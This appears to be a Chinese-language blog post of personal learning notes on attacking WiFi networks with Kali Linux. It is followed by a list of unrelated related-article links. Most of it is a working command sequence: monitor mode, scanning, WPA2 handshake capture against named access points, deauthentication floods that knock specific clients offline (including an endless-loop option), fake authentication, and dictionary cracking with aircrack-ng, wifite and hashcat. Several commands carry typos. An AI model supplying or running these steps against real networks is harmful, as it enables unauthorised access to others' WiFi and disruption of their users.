D4:EE:07:59:CE:70  -33        5        1    0   8  130   WPA2 CCMP   PSK  CMCC-1024                                                                     EC:41:18:28:03:40  -66        5        0    0   6  130   WPA2 CCMP   PSK  Xiaomi_033F

当前网卡
Current MAC: 1c:bf:ce:b6:42:06 (unknown)
Permanent MAC: 1c:bf:ce:b6:42:06 (unknown)

  • 抓握手包
    airodump-ng -c 4 --bssid EC:41:18:28:03:40 -w hach wlan0mon

开启监听模式
airmon-ng start wlan0
查看wifi网卡信息
iwconfig
嗅探wifi

airodump-ng wlan0mon

攻击
aireplay-ng -0 1 –a EC:41:18:28:03:40 -c 08:ED:B9:89:FB:B1 wlan0mon

  • -0 Deautenticate 冲突模式
    使已经连接的合法客户端强制断开与路由端的连接,使其重新连接。在重新连接过程中获得验证数据包,从而产生有效 ARP request。
    如果一个客户端连在路由端上,但是没有人上网以产生有效数据,此时,即使用-3 也无法产生有效 ARP request。所以此时需要用-0 攻击模式配合,-3 攻击才会被立刻激活。
    aireplay-ng -0 10 –a -c wifi0 参数说明:
    【-0】:冲突攻击模式,后面跟发送次数(设置为 0,则为循环攻击,不停的断开连接,客户端无法正常上网)
    【-a】:设置 ap 的 mac
    【-c】:设置已连接的合法客户端的 mac。
    如果不设置-c,则断开所有和 ap 连接的合法客户端。
    aireplay-ng -3 -b -h wifi0
    aireplay-ng -3 -b EC:41:18:28:03:40 -h EC:41:18:28:03:40 wifi0

冲突模式

aireplay-ng -0 10 –a <ap mac> -c <my mac> wifi0

注:使用此攻击模式的前提是必须有通过认证的合法的客户端连接到路由器

  • fake count

aireplay-ng --fakeauth 0 -a EC:41:18:28:03:40 -c 1c:bf:ce:b6:42:06 wlan0mon

查看wifi设备?不可用
airmon-ng show wlan device

开始嗅探
airmon-ng start wlan0网卡将从 wlan0 ->wlan0mon```

扫描wifi
airodump-ng wlan0mon

抓取握手包 handshake package

iairodump-ng -c 4 --bssid EC:41:18:28:03:40 -w hackdir wlan0mon
跑包tcpdump .cap后缀包

aircrack-ng -2 -b mac_address dic.txt resouce.cap
踢用户

aireplya-ng -0 10 -a EC:41:18:28:03:40 -c target-wifi-mac-user wlan0mon

比如
aireplay-ng -0 10 -a EC:41:18:28:03:40 -c A2:4E:03:10:C7:73 wlan0mon
-c是用户的手机mac地址,-a是路由器的mac也就是bssid地址

 D4:EE:07:59:CE:70  -39       35       26    0   8  130   WPA2 CCMP   PSK  CMCC-1024                                                                 [0KEC:41:18:28:03:40  -63       19        0    0   6  130   WPA2 CCMP   PSK  Xiaomi_033F                                                               [0K6C:38:45:7D:33:BD  -68        4        0    0   6  130   WPA2 CCMP   PSK  ChinaNet-vteT
  • 使用wifite
    enter wifite scan wifi and client?
    wifite ctrl+c choose number crack, all crack all
    wifite默认字典
    vim /usr/share/dict/wordlist-probable.txt

冲突问题解决
在虚拟机重新选择网卡, 或者重启kili或者执行
service network-manager stop,以及
airmon-ng check kill

安装hcxdumptool

下载源码编译(使用root运行,Linux内核版本>=4.14) https://github.com/ZerBea/hcxdumptool/archive/4.2.0.tar.gz tarf -xvf 4.2.0.tar.gz cd hcxdumptool-4.2.0 make && make install # 编译完成后的工具均安装在/usr/local/bin/目录下
hcxtools
安装依赖软件包,解决编译报错 apt-get install libcurl4-openssl-dev libssl-dev zlib1g-dev libpcap-dev #下载源码编译(使用root运行) wget https://github.com/ZerBea/hcxtools/archive/4.2.0.tar.gz tar -xvf 4.2.0.tar.gz cd hcxtools-4.2.0 make && make install # 编译完成后的工具均安装在/usr/local/bin/目录下。
除了使用下载方法进行编译外还可以使用进行修改 源编译.

首先复制下面文本

#清华大学源
deb http://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free
deb-src https://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free
#浙江大学源
deb http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-free
deb-src http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-free
#官方源
#deb http://http.kali.org/kali kali-rolling main non-free contrib
#deb-src http://http.kali.org/kali kali-rolling main non-free contrib
#中科大
deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
#阿里云
#deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
#deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
#东软大学
#deb http://mirrors.neusoft.edu.cn/kali kali-rolling/main non-free contrib
#deb-src http://mirrors.neusoft.edu.cn/kali kali-rolling/main non-free contrib
#重庆大学
#deb http://http.kali.org/kali kali-rolling main non-free contrib
#deb-src http://http.kali.org/kali kali-rolling main non-free contrib
————————————————

输入命令
gedit到或者vim /etc/apt/sources.list
参考链接:https://blog.csdn.net/xsgjm/article/details/105847524

wifi crack hcxdumptool下载地址
https://github.com/ZerBea/hcxdumptool

跑字典
aircrack-ng -w /1.txt /root/use/cap.cap

攻击wifi设备的标准步骤
Step 1:

airodump-ng -c <CH> -bssid <ap_mac_address> -w <wifi-show-name>
irodump-ng -c 6 -bssid  EC:41:18:28:03:40  -w Xiaomi_033F wlan0mon

输入后你讲看到这2个列,Station列代表的是mac地址,没有的话,要么抓不到,要么是每用户连接
Station: Frames ,

Step 2:

aireply-ng -0 10 -a AP_BSSID -C STATION_MAC_ADDRESS
10 is attach count, APP_BSSID IS WIFI_MAC_ADDRESS

STATION_MAC_ADDRESS IS YOU PHONE OR OTHER CLIENT MAC ADDRESSS

kali系统更新
apt-get upgradeupgrade all soft
apt-get update updateversion info
apt-get dist-upgradeupdate all system
跑包其它方法
EWSA 5.1.271破包工具 WIFIPR 中文汉化免安装

字典生成的不说了,kali有命令…
linux好久没玩了
sudo su切换超级用户 需要输入系统密码.
passwd在su模式下可以修改密码
以后执行su输入密码就行了
kali安装的时候有一个设备路径必须选择,否则开启启动就黑屏.

关于虚拟机问题也有很多,15蓝屏,修复蓝屏又导致另外一个问题,反正就是一个死循环了,后面升级15搞定了.

最后关于密码穷举的问题普及一下,一种就是一个一个的连接尝试,这样非常慢,2秒尝试一个密码,
这个window用python脚本就行
还有一种就是抓用户握手包,踢下线就能抓了,但是不是什么路由器都能查看到设备,或者能踢下线的.
抓到了加密包,就需要穷举了,速度比那个还要好一点

下图可以看出来基本上看不到设备数…

抓包和基本字典测试.

hashcat64 破解

hashcat64.exe -m 25000 -a -3 -2 ?l?d 2.hccapx ?2?2?2?2?2?2?2?2
cap转capx
aircrack-ng 文件名 -j 新文件.

最后补充:
kali里面如果vmtool弄不上可以重新添加cd设备,反复开机多次成功,桌面出现就代表成功了.
命令行执行的方式我试过,没效果.

无线渗透学习笔记使用kali系统抓握手包以及跑字典相关相关推荐

  1. 学习笔记之IP分片抓包实验

    学习笔记之IP分片抓包实验 摘要 分片实验 identification字段 附:`MTU`和`MSS` 1,MTU(Maximum Transmission Unit,MTU),最大传输单元 2,M ...

  2. Linux学习笔记之——Linux系统内部相关介绍

    Linux学习笔记之--Linux系统内部相关介绍 摘要:主要记录一些比较有用的能够帮助理解和使用Linux的知识.比如一些相关概念.没兴趣的看看就好.知道有这么个东西.注意事项.和一些常用目录的作用 ...

  3. STM32F103学习笔记四 时钟系统

    STM32F103学习笔记四 时钟系统 本文简述了自己学习时钟系统的一些框架,参照风水月 1. 单片机中时钟系统的理解 1.1 概述 时钟是单片机的脉搏,是单片机的驱动源 用任何一个外设都必须打开相应 ...

  4. oracle如何往dg加盘_学习笔记:Oracle DG系统 主备库中表空间和数据文件增加删除等管...

    天萃荷净 Oracle Data Guard表空间和数据文件管理汇总 汇总日常工作中操作,在Oracle DG结构系统中,如何删除备库表空间和数据文件,如何管理主库与备库之间的文件系统,详见文章内容. ...

  5. PhysX学习笔记2 -cloth系统3d模型的导入

    PhysX学习笔记2 -cloth系统3d模型的导入 PhysX的cloth的demo中,3d模型是用.obj格式. 环境:win2000, PhysX安装包: PhysX_6.11.01_Syste ...

  6. 28 Oracle深度学习笔记——ORACLE自带DBMS函数包

    28.Oracle深度学习笔记--ORACLE自带DBMS函数包 欢迎转载,转载请标明出处:http://blog.csdn.net/notbaron/article/details/50830889 ...

  7. 28.Oracle深度学习笔记——ORACLE自带DBMS函数包

    28.Oracle深度学习笔记--ORACLE自带DBMS函数包 欢迎转载,转载请标明出处:http://blog.csdn.net/notbaron/article/details/50830889 ...

  8. 操作系统学习笔记-04-操作系统的运行机制和体系结构

    操作系统学习笔记-2019 王道考研 操作系统-04-操作系统的运行机制和体系结构 文章目录 4-操作系统的运行机制和体系结构 4.1知识总览 4.2运行机制 4.2.1预备知识:什么是指令? 4.2 ...

  9. 操作系统学习笔记-03-操作系统的发展和分类

    操作系统学习笔记-2019 王道考研 操作系统-01-操作系统的概念(定义),功能和目标 文章目录 3-操作系统的发展和分类 3.1知识总览 3.2 手工操作,纸带机,串行式 3.3批处理阶段 -单道 ...

  10. 操作系统学习笔记-02-操作系统的特征

    操作系统学习笔记-2019 王道考研 操作系统-2-操作系统的特征 文章目录 02-操作系统四个的特征 2.1-知识概览 2.2并发 2.3共享 2.3并发和共享的关系 2.4虚拟 2.5小结:虚拟技 ...

最新文章

  1. 【2018.2.28】思考与练习
  2. Ubuntu 修改时区和时间
  3. ASP.NET MVC Controller激活系统详解:默认实现
  4. 银河麒麟4安装MySQL8_2020-03-24 linux 安装mysql8.0
  5. 设计模式六大原则_设计模式—设计六大原则
  6. 《Web项目实践》实验报告——Web项目实践基础
  7. 除了负载均衡,Nginx还可以做很多,限流、缓存、黑白名单等
  8. 网络爬虫--14.【糗事百科实战】
  9. mysql事务、视图
  10. db2离线备份_DB2高危操作LOAD命令风险详解
  11. inDesign教程,如何设置名片?
  12. 利用SPSS Modeler进行数据挖掘——探究不同程序语言的就业情况
  13. keil更改黑色背景颜色
  14. 张博涵清华大学_特别专访 | 张博涵 上
  15. 服务器c盘logs文件夹,Win10系统Logs文件夹有什么作用Logs文件夹可以删除吗
  16. S3C2440的中断体系结构
  17. .net 后端生成海报
  18. 小白怎么学习python
  19. 春雨医生官宣“莆田系”医院名单 北京24家“上榜”
  20. 5118股市基金行业词库数据【高频词+疑问词+行业根词】

热门文章

  1. Golang:后台管理系统Revel搭建教程
  2. Google Gmail十年回首
  3. c语言课程设计作业心得体会,c语言课程设计总结心得
  4. Python 爬虫框架Scrapy Spiders学习
  5. 计算机主板维修试卷,计算机主板维修试卷.doc
  6. 怎么创建自己的博客网站
  7. 传教士过河java_野人和传教士渡河问题的java实现
  8. 2021-05-26--CHEN scary
  9. jmeter生成接口测试报告
  10. 腾讯实习生面试经历及入职体验